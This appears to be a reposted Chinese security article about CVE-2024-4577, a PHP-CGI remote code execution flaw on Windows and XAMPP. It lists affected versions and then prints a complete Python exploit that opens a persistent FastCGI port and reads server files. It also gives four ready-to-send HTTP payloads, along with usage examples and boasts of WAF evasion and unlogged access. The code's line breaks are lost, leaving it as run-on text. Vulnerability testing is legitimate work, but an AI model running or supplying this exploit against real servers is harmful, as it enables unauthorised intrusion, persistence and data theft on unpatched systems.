一、基本概述
CVE-2024-4577漏洞已经爆出来很长时间,目前,号称“全球首个利用默认PHP环境(XAMPP)的CVE-2024-4577 PHP-CGI远程代码执行漏洞的EXP”发布。该EXP不仅支持服务器端请求伪造(SSRF),还支持绕过Web应用防火墙(WAF)。经测试,该工具破坏力较强,具有以下特点:
1、无需依赖allow_url_include、auto_prepend_file、auto_append_file即可实现RCE,可以包含任意文件和PHP文件。2、避免使用WAF经常拦截的关键词allow_url_include、auto_prepend_file、auto_append_file。FastCGI服务端的所有通讯不会被WAF记录。3、监听新端口,实现对PHP服务端的持久化控制,独立于Apache和PHP。
二、CVE-2024-4577 影响版本
PHP Windows 版本
8.3.0 <= 影响版本 < 8.3.88.2.0 <= 影响版本 < 8.2.208.1.0 <= 影响版本 < 8.1.29影响版本 == 8.0.x影响版本 == 7.x影响版本 == 5.x
XAMPP Windows 版本
8.2.0 <= 影响版本 <= 8.2.128.1.0 <= 影响版本 <= 8.1.25影响版本 == 8.0.x影响版本 == 7.x影响版本 == 5.x
三、风险防范
可使用脚本提前测试:
# python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPortimport requestsimport socketimport structimport sysFCGI_BEGIN_REQUEST = 1FCGI_ABORT_REQUEST = 2FCGI_END_REQUEST = 3FCGI_PARAMS = 4FCGI_STDIN = 5FCGI_STDOUT = 6FCGI_STDERR = 7FCGI_DATA = 8FCGI_GET_VALUES = 9FCGI_GET_VALUES_RESULT = 10FCGI_UNKNOWN_TYPE = 11FCGI_RESPONDER = 1FCGI_KEEP_CONN = 1request_id = 1def fcgi_header(type, request_id, content_length, padding_length):return struct.pack('!BBHHBx', 1, type, request_id, content_length, padding_length)def fcgi_begin_request(request_id, role, flags):body = struct.pack('!HB5x', role, flags)return fcgi_header(FCGI_BEGIN_REQUEST, request_id, len(body), 0) + bodydef fcgi_params(request_id, name, value):nlen = len(name)vlen = len(value)body = struct.pack('BB', nlen, vlen) + name.encode() + value.encode()return fcgi_header(FCGI_PARAMS, request_id, len(body), 0) + bodydef fcgi_end_params(request_id):return fcgi_header(FCGI_PARAMS, request_id, 0, 0)def fcgi_stdin(request_id, data):body = data.encode()return fcgi_header(FCGI_STDIN, request_id, len(body), 0) + bodydef fcgi_end_stdin(request_id):return fcgi_header(FCGI_STDIN, request_id, 0, 0)def send_request(host, cgi_bind_port, script_filename):sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(5)sock.connect((host, int(cgi_bind_port)))params = {'SCRIPT_FILENAME': script_filename}sock.sendall(fcgi_begin_request(request_id, FCGI_RESPONDER, 0))for name, value in params.items():sock.sendall(fcgi_params(request_id, name, value))sock.sendall(fcgi_end_params(request_id))sock.sendall(fcgi_end_stdin(request_id))response = b''while True:data = sock.recv(1024)if not data:breakresponse += datasock.close()return responsedef exp1(host, http_port, cgi_bind_port):url = 'http://{}:{}/php-cgi/php-cgi.exe?%adb{}:{}'.format(host, http_port, host, cgi_bind_port)try:r = requests.get(url, headers={'User-Agent':'', 'Redirect-Status': 'XCANWIN'}, timeout=2)except Exception as e:passdef exp2(host, cgi_bind_port, script_filename):response = send_request(host, cgi_bind_port, script_filename)print(response.decode(errors='ignore'))host, http_port = sys.argv[1].split(":")script_filename = "C:/windows/system.ini" # can include *.php filecgi_bind_port = "9999"exp1(host, http_port, cgi_bind_port)exp2(host, cgi_bind_port, script_filename)
工具使用方法:
场景一:
存在WAF和默认场景:
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort例如:
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80场景二:
存在SSRF和默认场景:
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"场景三:
一般测试:
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: PhpServerHost<?php die("Te"."sT");?>
场景四:
默认场景:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: PhpServerHostREDIRECT-STATUS: XCANWIN<?php die("Te"."sT");?>
结果鉴别:
观察是否返回字符串 "TesT" 或服务端system.ini文件内容,如果出现结果则说明存在RCE漏洞,需及时升级最新版本。
原文始发于微信公众号(信安王子):PHP-CGI 远程代码执行漏洞利用工具预警 CVE-2024-4577
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论